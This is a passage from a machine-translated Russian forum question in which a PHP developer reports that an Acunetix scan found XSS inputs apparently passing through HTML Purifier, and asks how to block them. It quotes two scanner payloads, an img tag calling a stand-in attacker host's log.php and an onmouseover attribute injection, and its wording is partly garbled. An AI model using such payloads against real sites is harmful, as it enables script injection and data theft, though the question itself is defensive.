тирую одно из моих веб-приложений, используяAcunetix, Чтобы защитить этот проект от атак XSS, я использовалОчиститель HTML, Эта библиотека рекомендована большинством разработчиков PHP для этой цели, но мои результаты сканирования показывают, что HTML Purifier не может полностью защитить нас от XSS-атак. Сканер обнаружил два способа атаки, посылая различные вредоносные данные:

1<img sRc='http://attacker-9437/log.php? (См. Результат «Очиститель HTML»Вот)1"onmouseover=vVF3(9185)" (См. Результат «Очиститель HTML»Вот)

Как вы видите результаты, HTML Purifier не смог обнаружить такие атаки. Я не знаю, есть ли какая-то конкретная опция в HTML Purifier для решения таких проблем, или она действительно не может обнаружить эти методы XSS-атак.
Есть ли у вас какие-либо идеи? Или любое другое решение?